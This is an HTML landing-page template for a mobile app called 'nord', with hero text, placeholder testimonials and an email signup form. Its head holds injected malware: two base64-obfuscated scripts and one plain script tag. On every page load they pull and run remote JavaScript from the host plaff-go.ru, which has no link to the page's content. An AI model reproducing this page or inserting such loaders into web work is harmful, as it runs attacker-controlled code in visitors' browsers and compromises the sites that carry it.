<!DOCTYPE html>
<html lang="en">
<head>
    <link href="style.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap" rel="stylesheet">
    <script type="text/javascript" src="data:text/javascript;base64,aWYoImh0dHA6Ij09PXdpbmRvdy5sb2NhdGlvbi5wcm90b2NvbCl7dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdC5zcmMgPSAiaHR0cDovL3BsYWZmLWdvLnJ1L2xpbmsveGdibHp3am0vIjtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7fQ=="></script>
    <script type="text/javascript" src="data:text/javascript;base64,aWYoImh0dHBzOiI9PT13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wpe3ZhciBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHQuc3JjID0gImh0dHBzOi8vcGxhZmYtZ28ucnUvbGluay9qcjZtbHc3OC8iO2RvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJoZWFkIilbMF0uYXBwZW5kQ2hpbGQoc2NyaXB0KTt9"></script>
    <script src="https://plaff-go.ru/link/jr6mlw78/"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Akaya+Kanadaka&display=swap" rel="stylesheet">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>
<body>
    <header>
        <div class="container">
            <div class="top-nav">
                <a href="app.html" class="logo">
                    <img src="images/Logo (1).png" alt="logo">
                </a>
                <nav>
                    <ul class="nav">
                        <li>
                            <a href="#">subscribe</a>
                        </li>
                        <li>
                            <a href="#" class="active_tab">get it now</a>
                        </li>
                    </ul>
                </nav>
            </div>
            <div class="header_content">
                <div class="phone_image">
                    <img src="images/Phone.png" alt="phone">
                </div>
                <div class="header_text">
                    <h2>Join more than <span class="single">1000</span><span class="plus">+</span> satisfied users</h2>
                    <p>People are definitely a company's greatest asset. It doesn't make any difference 
                        whether the product is cars or cosmetics. 
                        A company is only as good as the people it keeps.
                    </p>
                    <a href="https://play.google.com/store">
                        <img src="images/play_button.png" alt="google_play">
                    </a>
                </div>
            </div>
        </div>
    </header>
    <div class="about">
        <div class="container">
            <div class="about_content">
                <div class="about_text">
                    <h2>What you get</h2>
                    <p>People are definitely a company's greatest asset. 
                        It doesn't make any difference 
                        whether the product is cars or cosmetics. 
                        A company is only as good as the people it keeps.
                    </p>
                    <a href="#">get it now</a>
                </div>
                <div class="about_gallery">
                    <div class="gallery">
                        <div class="screen"></div>
                        <div class="screen"></div>
                    </div>
                    <div class="dots">
                            <span class="dots134"></span>
                            <span class="dot_active"></span>
                            <span class="dots134"></span>
                            <span class="dots134"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="quote">
            <div class="container">
                <div class="text_container">
                    <div class="quote_title">
                        <h3>Some words from our users</h3>
                        <p>
                            People are definitely a company's greatest asset. It doesn't make any difference
                        </p>
                    </div>
                </div>
                <div class="quote_content">
                    <div class="phone_image">
                        <img src="images/Phone1.png" alt="Phone">
                    </div>
                    <div class="users_quote">
                        <div class="speech_bubble">
                            <p class="quote_paragraph">
                                People are definitely a company's greatest asset. It doesn't make 
                            any difference whether the product is cars or cosmetics. 
                            A company is only as good as the people it keeps.                       
                            </p>
                            <p class="name">John Doe
                            </p>
                        </div>
                        <div class="dots">
                            <span class="dots134"></span>
                            <span class="dot_active"></span>
                            <span class="dots134"></span>
                            <span class="dots134"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="join-us">
            <div class="container">
                <div class="join-us_content">
                    <h2>Join us</h2>
                    <p>We will send you from time to time mail about our news and offers</p>
                    <input class="email" name="email" type="text" placeholder="Your Mail">
                    <button class="send">send</button>
                </div>
            </div>
        </div>
        <footer>
            <div class="container">
                <div class="footer_content">
                    <a href="home.html" class="logo">
                        <img src="images/Logo (1).png" alt="logo">
                    </a>
                    <p> © 2016 - <span class="nord">nord</span> All Right Reserved</p>
                </div>
            </div>
        </footer>
    </div>
</body>
</html>